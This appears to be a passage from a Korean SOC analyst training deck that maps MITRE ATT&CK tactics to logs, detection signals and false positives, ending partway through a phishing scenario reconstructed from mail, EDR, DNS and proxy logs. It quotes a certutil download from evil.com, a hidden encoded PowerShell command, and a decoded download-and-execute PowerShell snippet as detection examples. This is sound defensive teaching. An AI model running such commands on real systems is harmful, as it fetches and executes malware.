T1133 External Remote Services — VPN·RDP·Citrix 정상 채널 악용
T1078 Valid Accounts — 탈취·구매된 정상 계정으로 로그인
T1195 Supply Chain Compromise — 소프트웨어 공급망 침해 (SolarWinds 유형)
T1091 Replication Through Removable Media — USB 등 물리 매체

탐지 포인트

메일 게이트웨이: 의심 첨부파일, 악성 URL, 스푸핑 도메인
WAF/IPS: CVE 기반 웹 공격 시그니처, SQLi·RCE 패턴
VPN/원격 접속: 비업무 시간·해외 IP·신규 디바이스 로그인
EDR: 오피스 애플리케이션이 자식 프로세스(cmd/ps) 생성

⚠️ 오탐 구분: VPN 해외 로그인 → 출장자 여부 확인 필수. 정상 자동화 스크립트도 오피스→cmd 실행 가능 → 프로세스 체인 상세 확인 필요

보강 설명 Initial Access는 SOC에서 가장 중요하게 보는 Tactic 중 하나입니다. 피싱, 웹 취약점, 공급망 공격 등 다양한 경로가 있습니다. 초기 침투 경로를 놓치면 이후 공격 체인 전체가 블라인드… 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

TA0001T1566T1190

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
TA0001 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

Execution (TA0002) — 코드 실행

공격자가 시스템에서 악성 코드를 실행하는 단계 — 정상 관리 도구 악용이 핵심 도전

PART 3 · Tactic 심화

대표 Technique

T1059 Command & Scripting Interpreter — PowerShell(.001), Bash(.004), Python(.006)
T1047 Windows Management Instrumentation (WMI) — 원격 실행, 프로세스 생성
T1053 Scheduled Task/Job — 예약 작업 등록으로 코드 실행
T1204 User Execution — 사용자가 직접 악성 파일 실행 (피싱 연동)
T1218 System Binary Proxy Execution — LOLBin (regsvr32, mshta, certutil 등)
T1106 Native API — Windows API 직접 호출

탐지 포인트 & 오탐

탐지: -Encoded/-w hidden/-NoProfile PowerShell 파라미터
탐지: LOLBin으로 외부 URL 접근 (certutil -urlcache)
탐지: WMI를 통한 원격 프로세스 생성
오탐: IT 관리팀 PowerShell 자동화 스크립트
오탐: 소프트웨어 배포 시스템(SCCM)의 WMI 활용

# 의심 PowerShell 실행 예시 powershell.exe -w hidden -Nop -Enc JABjAD0... # LOLBin 악용 예시 certutil.exe -urlcache -split -f http://evil.com/p.exe

보강 설명 Execution은 공격자가 내부에서 코드를 실행하는 단계입니다. 가장 많은 Technique가 있는 Tactic 중 하나입니다. PowerShell, WMI, 스크립트 등이 대표적이며 정상 관리 도구와 겹치는… 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

TA0002T1059T1047

이해 포인트

TA0002를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
T1059 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

Persistence (TA0003) — 지속성 확보

재부팅·계정 변경 후에도 접근을 유지하는 메커니즘 — 탐지 지연 = 장기 침해

PART 3 · Tactic 심화

대표 Technique

T1053.005 Scheduled Task — Windows 작업 스케줄러로 백도어 실행
T1053.003 Cron Job — Linux crontab으로 주기적 실행
T1543.003 Windows Service — 악성 서비스 등록
T1547.001 Registry Run Keys — HKCU\Run, HKLM\Run 레지스트리
T1505.003 Web Shell — 웹 서버에 업로드된 백도어 스크립트
T1136 Create Account — 추가 관리자 계정 생성 (백도어 계정)

탐지 포인트 & 오탐

탐지: 신규 예약 작업 생성 (EventID 4698/4702)
탐지: Run 레지스트리 키 수정 (Sysmon EventID 13)
탐지: 웹 루트 디렉토리 신규 .php/.aspx 파일 생성
탐지: 업무 시간 외 신규 계정 생성 (EventID 4720)
오탐: 정상 소프트웨어 설치 시 서비스·예약 작업 등록

🚨 웹쉘 탐지: 웹 서버 디렉토리에 새로 생성된 실행 가능 파일 → 파일 해시, 내용 분석, 접근 IP 확인 필수

보강 설명Persistence는 공격자가 재부팅이나 계정 변경 후에도 접근을 유지하기 위한 메커니즘입니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커집니다.

TA0003T1053.005Persistence

설명 확장

TA0003를 목적-기술-근거 관점으로 다시 정리하기
T1053.005와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

Persistence 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

Privilege Escalation (TA0004) — 권한 상승

낮은 권한에서 높은 권한으로 — 도메인 관리자 획득은 내부 전체 위험 신호

PART 3 · Tactic 심화

대표 Technique

T1055 Process Injection — DLL 인젝션, Process Hollowing으로 권한 있는 프로세스 내 실행
T1078 Valid Accounts — 높은 권한 계정 탈취 후 사용 (도메인 관리자)
T1068 Exploitation for Privilege Escalation — 커널·드라이버 취약점 익스플로잇
T1548.002 Bypass UAC — Windows UAC 우회
T1134 Access Token Manipulation — 토큰 조작으로 권한 상승

탐지 포인트 & 오탐

탐지: 낮은 권한 프로세스 → 높은 권한 자식 프로세스 생성
탐지: 도메인 관리자 계정의 비정상 시스템 접근 (EventID 4672)
탐지: UAC 우회 관련 레지스트리 변경
탐지: 서비스 계정의 대화형 로그인 (EventID 4624 Type 2)
오탐: 정상 설치 프로그램의 권한 상승 요청 (MSI 설치)

🚨 핵심 경보: 일반 사용자 계정이 로컬/도메인 관리자 그룹에 추가되는 이벤트 (EventID 4728/4732) → 즉시 조사 필요

보강 설명Privilege Escalation은 공격자가 더 높은 권한을 획득해 더 많은 작업을 할 수 있게 되는 단계입니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커집니다.

TA0004T1055Privilege Escalation

설명 확장

TA0004를 목적-기술-근거 관점으로 다시 정리하기
T1055와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

Privilege Escalation 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

Defense Evasion (TA0005) — 탐지 회피

ATT&CK에서 가장 많은 Technique — 공격자가 탐지 체계를 무력화하는 모든 방법

PART 3 · Tactic 심화

대표 Technique

T1562.001 Disable Security Tools — AV/EDR 비활성화, 에이전트 프로세스 종료
T1027 Obfuscated Files or Info — Base64, 압축, 난독화로 시그니처 회피
T1218 System Binary Proxy Execution — LOLBin(mshta, regsvr32, certutil) 활용
T1070 Indicator Removal — 이벤트 로그 삭제, 타임스탬프 변경
T1036 Masquerading — 정상 파일명·경로로 위장 (svchost.exe 가장)
T1055 Process Injection — 정상 프로세스 메모리에 악성 코드 주입

탐지 포인트 & 오탐

탐지: 보안 에이전트 서비스 중지/삭제 이벤트
탐지: 이벤트 로그 클리어 (EventID 1102, 104)
탐지: 파일 경로와 파일명 불일치 (C:\Temp\svchost.exe)
탐지: Base64 긴 문자열 포함 커맨드 라인
오탐: IT가 보안 제품 업그레이드 시 에이전트 재시작

⚠️ 핵심 포인트: T1562 Impair Defenses(보안 도구 비활성화)는 에이전트 중지 이벤트 하나보다 서비스 변경+정책 변경+후속 실행이 묶여야 신뢰도가 높아진다

보강 설명 Defense Evasion은 ATT&CK에서 가장 많은 Technique를 보유한 Tactic입니다. 공격자가 탐지를 피하기 위해 사용하는 기술들입니다. LOLBin 활용, 인코딩, 로그 삭제 등이 대표적입니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

TA0005T1562T1027

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
TA0005·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

Credential Access (TA0006) — 자격증명 탈취

자격증명 탈취 → Valid Accounts 악용 → 탐지가 더 어려워지는 악순환의 시작

PART 3 · Tactic 심화

대표 Technique

T1110 Brute Force — 반복 로그인 시도, Password Spraying(.003), Credential Stuffing(.004)
T1003 OS Credential Dumping — LSASS 메모리 덤프(Mimikatz), SAM 파일 추출
T1558 Steal or Forge Kerberos Tickets — Kerberoasting, Golden Ticket
T1555 Credentials from Password Stores — 브라우저 저장 비밀번호, 키체인
T1056 Input Capture — 키로거, 웹 인증 양식 후킹

탐지 포인트 & 오탐

탐지: 짧은 시간 내 다수 계정 로그인 실패 (Password Spraying 패턴)
탐지: lsass.exe 프로세스에 대한 비정상 메모리 접근
탐지: 서비스 계정에 대한 Kerberos TGS 티켓 대량 요청
탐지: NTDS.dit, SAM, SECURITY 하이브 파일 접근
오탐: 계정 잠금 정책 테스트, AD 백업 솔루션

🚨 Password Spraying 패턴: 동일 소스 IP에서 수십 개 계정 각 1~2회 시도 → 계정 잠금 임계값을 의도적으로 피하는 패턴. 실패 횟수가 적어도 계정 수 많으면 위험

보강 설명 Credential Access는 공격 체인에서 특히 중요한 Tactic입니다. 자격증명을 탈취하면 Valid Accounts로 이어져 탐지가 더 어려워집니다. Kerberoasting, Pass-the… 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

TA0006T1110T1003

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
TA0006 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

Discovery (TA0007) — 내부 정찰

내부 진입 후 환경 파악 — 정상 IT 관리 작업과 겹치므로 양·패턴·주체를 함께 봐야 한다

PART 3 · Tactic 심화

대표 Technique

T1082 System Information Discovery — 시스템 정보, OS, 패치 현황
T1018 Remote System Discovery — 내부 IP/호스트 목록 수집 (net view, nmap)
T1087 Account Discovery — 계정 목록, 그룹 멤버십 조회
T1069 Permission Groups Discovery — 도메인 관리자·보안 그룹 열거
T1083 File and Directory Discovery — 민감 파일·디렉토리 탐색
T1046 Network Service Discovery — 포트 스캔, 서비스 열거

탐지 포인트 & 오탐

탐지: 일반 사용자 계정이 대량 net 명령 실행 (net user, net group, net view)
탐지: 내부 네트워크 스캔 (ICMP sweep, port scan)
탐지: LDAP 대량 쿼리 (AD 구조 열거)
오탐: IT 자산 관리 도구, 취약점 스캐너 (Nessus, Qualys)
오탐: 네트워크 모니터링 에이전트의 정기 스캔

💡 패턴 구분: 자산 관리 스캔은 스케줄에 따른 예측 가능한 패턴. 공격자 Discovery는 불규칙하고 범위가 넓으며 짧은 시간에 집중됨

보강 설명 Discovery는 공격자가 내부에 들어온 후 환경을 이해하기 위한 내부 정찰입니다. 정상 IT 관리 작업과 많이 겹치므로 행위의 양과 패턴, 실행 주체를 함께 봐야 합니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

TA0007T1082T1018

이해 포인트

TA0007를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
T1082 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

Lateral Movement (TA0008) — 내부 이동

초기 침투 지점에서 다른 시스템으로 — 정상 프로토콜 악용으로 탐지가 어려운 구간

PART 3 · Tactic 심화

대표 Technique

T1021.001 Remote Desktop Protocol (RDP) — 원격 데스크톱으로 다른 시스템 접근
T1021.002 SMB/Windows Admin Shares — ADMIN$, C$ 공유 폴더 통한 이동
T1021.006 WinRM — PowerShell Remoting 통한 원격 실행
T1550.002 Pass the Hash — NTLM 해시로 인증 없이 이동
T1570 Lateral Tool Transfer — PsExec, SMB로 도구 복사 후 실행
T1563 Remote Service Session Hijacking — 세션 탈취

탐지 포인트 & 오탐

탐지: 비정상 시간·방향의 RDP 연결 (사용자 A → 서버 B → 서버 C)
탐지: 관리 공유(ADMIN$) 접근 후 실행 파일 복사
탐지: PsExec.exe 또는 PsExec 서비스 등록 이벤트
탐지: 동일 NTLM 해시로 여러 시스템 인증 (Pass-the-Hash)
오탐: 정규 IT 원격 지원 (RDP), 서버 패치 자동화 도구

⚠️ 이동 경로 추적: Lateral Movement 탐지 시 A→B→C 경로 전체를 재구성해야 피해 범위 파악 가능. 첫 이동만 탐지하면 나머지는 블라인드스팟

보강 설명 Lateral Movement는 공격자가 초기 침투 지점에서 다른 시스템으로 이동하는 단계입니다. SMB, RDP, SSH, WMI 등 정상 프로토콜을 활용하므로 탐지가 어렵습니다. 이동 경로를 추적해 피해… 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

TA0008T1021Lateral Movement

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
TA0008 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

Collection (TA0009) — 데이터 수집

탈취할 데이터를 수집·압축·준비하는 단계 — 데이터 민감도와 사용자 역할을 함께 봐야 한다

PART 3 · Tactic 심화

대표 Technique

T1005 Data from Local System — 로컬 파일 탐색 및 수집
T1039 Data from Network Shared Drive — 공유 드라이브 대량 접근
T1213 Data from Information Repositories — SharePoint, Confluence, Jira 접근
T1560 Archive Collected Data — zip/rar/7z로 압축, 암호화
T1114 Email Collection — 메일함 대량 다운로드, 포워딩 규칙 설정
T1119 Automated Collection — 스크립트로 특정 파일 자동 수집

탐지 포인트 & 오탐

탐지: 민감 파일 접근 건수 급증 (DLP 이벤트)
탐지: 메일/문서 저장소 대량 조회 (CASB/Cloud Audit)
탐지: 비정상 시간 대용량 파일 압축 생성
탐지: 이메일 자동 전달 규칙 신규 생성
오탐: 정기 백업, 문서 마이그레이션, 감사 대응 자료 수집

💡 분석 후 액션: 데이터 민감도와 사용자 역할 비교 → 수집 후 압축·전송 행위 연결 → DLP·CASB 이벤트와 교차 분석

보강 설명 Collection은 공격자가 탈취할 데이터를 수집하는 단계입니다. 정기 백업이나 대용량 파일 작업과 겹치므로 데이터 민감도와 사용자 역할을 함께 봐야 합니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

TA0009T1005T1560

이해 포인트

TA0009를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
T1005 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

Command and Control (TA0011) — C2 통신

감염 시스템과 명령·결과를 주고받는 채널 — HTTPS·DNS·SaaS 활용으로 탐지 난이도 높음

PART 3 · Tactic 심화

대표 Technique

T1071 Application Layer Protocol — HTTP/S(.001), DNS(.004), SMTP(.003) 위장 통신
T1573 Encrypted Channel — TLS/SSL(.002) 암호화로 내용 분석 회피
T1568 Dynamic Resolution — DGA(도메인 생성 알고리즘), Fast Flux
T1572 Protocol Tunneling — DNS Tunneling, ICMP Tunnel
T1102 Web Service — Pastebin, Google Drive, GitHub을 C2로 활용
T1008 Fallback Channels — 여러 C2 채널 백업 운영

탐지 포인트 & 오탐

탐지: 주기적 DNS/HTTPS 통신 (Beaconing 패턴 — 일정 주기)
탐지: 희귀 도메인·이상 User-Agent 문자열
탐지: 장시간 소량 연결 유지 (Keep-alive 남용)
탐지: 자체 서명 TLS 인증서, 이상 JA3/JA3S 지문
오탐: 업데이트 에이전트, 모니터링 에이전트, SaaS 동기화 앱

⚠️ 분석 후 액션: 주기성·희귀성·프로세스 맥락 확인 → 도메인/인프라 평판 조회(VirusTotal, PassiveDNS) → 차단 전 업무 영향 검토

보강 설명 C2는 공격자가 감염 시스템과 지속적으로 통신하는 채널입니다. HTTPS, DNS, 정상 클라우드 서비스를 C2 채널로 활용하므로 탐지가 어렵습니다. 주기성, 희귀성, 프로세스 맥락을 함께 봐야 합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

TA0011T1071T1573

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
TA0011 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

Exfiltration (TA0010) — 데이터 유출

수집한 데이터를 외부로 반출 — 전송량만이 아닌 대상·사용자·시간을 함께 봐야 한다

PART 3 · Tactic 심화

대표 Technique

T1041 Exfiltration Over C2 Channel — C2 채널로 데이터 전송 (탐지 어려움)
T1567 Exfiltration Over Web Service — Google Drive, Dropbox, OneDrive에 업로드
T1020 Automated Exfiltration — 스크립트로 자동화된 주기적 전송
T1048 Exfiltration Over Alternative Protocol — DNS, ICMP, FTP를 전송 채널로 활용
T1030 Data Transfer Size Limits — 탐지 회피를 위한 소량 분할 전송

탐지 포인트 & 오탐

탐지: 업무 외 시간 대용량 업로드 (Netflow/Proxy)
탐지: 승인되지 않은 클라우드 스토리지로 업로드
탐지: 암호화된 아카이브 파일의 외부 전송
탐지: DNS 쿼리에 인코딩된 데이터 포함 (DNS Tunneling)
오탐: 정상 백업·대용량 협업, 영상·디자인 파일 업로드

🚨 분석 후 액션: 전송 대상·사용자·시간 교차 분석 → 스테이징 흔적(Collection) 역추적 → 전송된 데이터 내용 파악 → 법무·IR 연계 고려

보강 설명 Exfiltration은 공격자가 수집한 데이터를 외부로 반출하는 단계입니다. 전송량만 보지 말고 대상·사용자·시간을 함께 봐야 합니다. 정상 백업이나 대용량 협업과 구분이 필요합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

TA0010T1041T1567

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
TA0010 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

Impact (TA0040) — 목표 달성 및 영향

공격자 최종 목적 달성 — 여기까지 오면 비즈니스 영향 평가와 복구 계획이 최우선

PART 3 · Tactic 심화

대표 Technique

T1486 Data Encrypted for Impact — 랜섬웨어: 파일 암호화, 복호화 키 요구
T1490 Inhibit System Recovery — 백업 삭제, 볼륨 섀도 복사본 삭제 (VSS)
T1489 Service Stop — 주요 서비스 중지, 프로세스 종료
T1531 Account Access Removal — 계정 삭제, 비밀번호 변경, 로그아웃 강제
T1498 Network Denial of Service — DDoS 공격으로 서비스 가용성 침해
T1491 Defacement — 웹사이트 변조, 내부 문서 변조

탐지 포인트 & 즉시 대응

탐지: 대량 파일 확장자 변경 (랜섬웨어 암호화 지표)
탐지: vssadmin delete shadows 명령 실행
탐지: 주요 서비스(DB, 백업, AV) 동시 중지
탐지: 대량 계정 잠금 또는 비밀번호 변경

🚨 Impact 발생 시 즉시:
① 영향 범위 격리 ② 백업 무결성 확인 ③ 비즈니스 연속성 계획(BCP) 발동 ④ 경영진·법무·PR팀 즉시 보고 ⑤ 법집행기관 연계 검토

보강 설명Impact는 공격자가 최종 목적을 달성하는 단계입니다. 랜섬웨어 암호화, 데이터 파괴, 서비스 장애, 계정 삭제 등이 포함됩니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커집니다.

TA0040T1486Impact

설명 확장

TA0040를 목적-기술-근거 관점으로 다시 정리하기
T1486와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

Impact 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

14개 Tactic 전체 관찰 포인트 요약표

SOC 분석가가 머릿속에 갖고 있어야 할 Tactic별 핵심 로그와 다음 질문

PART 3 · 정리

Tactic	ID	핵심 로그 원천	주요 탐지 신호	다음에 볼 Tactic
Reconnaissance	TA0043	WAF, Firewall, Passive DNS	외부 스캔, 대량 조회	Initial Access
Resource Development	TA0042	CT Log, TI 피드, WHOIS	유사 도메인 등록	Initial Access
Initial Access	TA0001	메일GW, WAF, VPN, EDR	피싱 첨부, 웹 공격, 이상 로그인	Execution, Persistence
Execution	TA0002	EDR, Sysmon, WinEvent	PowerShell -enc, LOLBin	Defense Evasion, Persistence
Persistence	TA0003	EDR, 레지스트리, 파일 감사	예약작업 생성, 웹쉘, 서비스 등록	Privilege Escalation
Privilege Escalation	TA0004	EDR, WinEvent(4672)	권한 상승 이벤트, 프로세스 인젝션	Lateral Movement
Defense Evasion	TA0005	EDR, WinEvent(1102)	로그 삭제, 에이전트 중지	모든 Tactic과 연동
Credential Access	TA0006	AD, SIEM(4625), EDR	Brute Force, LSASS 접근	Lateral Movement, Collection
Discovery	TA0007	EDR, WinEvent, LDAP	net 명령 대량, 내부 스캔	Lateral Movement
Lateral Movement	TA0008	WinEvent(4624), Firewall	RDP/SMB 이상 경로, PsExec	Collection, Exfiltration
Collection	TA0009	DLP, CASB, 파일 감사	민감 파일 대량 접근, 압축	Exfiltration
Command & Control	TA0011	DNS, Proxy, NetFlow	Beaconing, DGA, 이상 UA	Collection, Exfiltration
Exfiltration	TA0010	Proxy, NetFlow, CASB	대용량 외부 업로드	Impact
Impact	TA0040	EDR, 파일 감사, 서비스 로그	파일 암호화, VSS 삭제	즉시 BCP 발동

보강 설명 14개 Tactic 전체를 한 표에 정리합니다. SOC 분석가는 이 표를 머리 속에 지도처럼 갖고 있어야 합니다. 각 Tactic의 핵심 로그 원천과… 대표 예시와 로그를 묶어 보면 이해가 빨라집니다.

14개 Tactic 요약로그 원천다음 Tactic

이해 포인트

14개 Tactic 요약를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기

PART 4

시나리오 분석 1
피싱 기반 침해 시나리오

피싱 메일 수신 → 첨부파일 실행 → 내부 정찰 → C2 연결 → 데이터 수집 체인을 로그로 재구성한다

⏱️ 약 50분 📌 T1566 → T1059 → T1071 → T1005 📌 매핑 실습 포함

피싱 기반 침해 시나리오 전체 개요

재무팀 직원이 스피어피싱 메일을 받고 첨부파일을 실행 — 내부 정찰과 C2 연결까지 이어진 실제형 시나리오

PART 4 · 피싱 시나리오

T1566.001 ① 피싱 메일 수신

스피어피싱 첨부파일(.xlsm) 수신. 발신자 위장, 긴급성 유도

T1204.002 ② 사용자 파일 실행

엑셀 매크로 활성화 → 악성 코드 실행 시작

T1059.001 ③ PowerShell 실행

excel.exe → cmd.exe → powershell.exe -enc 체인

T1105 ④ 페이로드 다운로드

외부 C2 서버에서 2단계 페이로드 다운로드

T1082+T1018 ⑤ 내부 정찰

systeminfo, net user, net view 등 정찰 명령

T1071.001 ⑥ C2 통신 시작

HTTPS Beaconing 시작. 주기적 외부 통신

📡 관련 로그 원천: 메일 게이트웨이 · EDR(Process/Network) · DNS · Proxy · SIEM 상관규칙

🎯 분석 목표: 각 단계의 로그를 ATT&CK Technique에 매핑하고, 전체 체인을 하나의 보고 문장으로 설명한다

보강 설명피싱 시나리오 전체 흐름을 먼저 보여주고, 각 단계에서 어떤 로그가 나오는지 미리 안내합니다. 시간축과 로그 근거를 함께 묶어 설명하면 공격 체인의 맥락이 훨씬 선명해집니다.

T1566.001T1204.002피싱 공격 체인

시나리오 확장

T1566.001가 앞뒤 단계와 어떻게 이어지는지 정리
T1204.002를 시간축으로 놓고 체인으로 연결하기
공격자 목적과 피해 자산을 한 문장으로 설명

판단 포인트

정상 운영과 다른 기준 2~3개를 명확히 적기
계정·프로세스·네트워크 증거를 함께 교차 보기
차단 시점과 피해 최소화 지점을 구분해 보기

실무 적용

즉시 조치와 후속 조치를 나눠서 제안
보고 문장에는 ATT&CK ID와 영향 범위 포함
재발 방지를 위한 룰·정책 보완점까지 적기

피싱 시나리오 Step 1~2: 메일 수신 & 파일 실행 로그

메일 게이트웨이 + EDR 프로세스 로그로 피싱 초기 침투를 확인하는 과정

PART 4 · 피싱 시나리오

# 메일 게이트웨이 로그 (Step 1) 2024-11-15 09:23:11 SMTP RECEIVED From: cfo-office@corp-finance.co.kr (실제: 203.0.113.88 — 타사 도메인) To: kim.jihye@targetco.com Subject: [긴급] Q4 예산 승인 요청_최종.xlsm Attachment: Q4예산승인_최종.xlsm (2.3MB) DKIM: FAIL SPF: FAIL # → 도메인 스푸핑 징후

# EDR 프로세스 로그 (Step 2) 2024-11-15 09:31:44 EXCEL.EXE PID=4821 spawns cmd.exe PID=5102 spawns powershell.exe PID=5388 cmdline: -w hidden -Nop -Enc JABjAGMA... # → Office → Shell 프로세스 체인: 매우 높은 위협 신호

ATT&CK 매핑

T1566.001 Spearphishing Attachment
근거: DKIM/SPF FAIL + 긴급성 제목 + .xlsm 첨부
T1204.002 Malicious File
근거: 사용자가 xlsm 매크로 활성화 후 실행
T1059.001 PowerShell
근거: EXCEL.EXE → cmd.exe → powershell.exe -Enc 체인

✅ Confidence: High
Office → Shell 자식 프로세스 생성은 매크로 악용의 명확한 지표. 3개 Technique 동시 확인으로 High Confidence 달성

보강 설명 메일 게이트웨이와 EDR 로그에서 피싱 첨부파일 실행을 어떻게 탐지하는지 보여줍니다. 특히 office 프로세스가 cmd/powershell을 자식으로 생성하는 패턴은 매우 신뢰도 높은 지표입니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1566.001T1204.002메일 게이트웨이

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1566.001 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

피싱 시나리오 Step 3~4: PowerShell 실행 & 페이로드 다운로드

인코딩된 PowerShell이 외부 C2에서 2단계 페이로드를 다운로드하는 과정

PART 4 · 피싱 시나리오

# PowerShell 디코딩 결과 (Step 3) # Base64 디코딩 후 내용: $url = "https://update-cdn.net/win/svc.exe" $path = "$env:TEMP\svchost32.exe" Invoke-WebRequest -Uri $url -OutFile $path Start-Process $path # DNS 로그 (Step 4) 09:31:52 DNS Query: update-cdn.net → Resolved: 103.102.45.201 → Country: HK | Created: 2024-11-01 → VirusTotal: 8/94 malicious

# Proxy 로그 GET https://update-cdn.net/win/svc.exe 200 OK size=892KB User-Agent: Mozilla/5.0 (compatible)

ATT&CK 매핑

T1027 Obfuscated Files
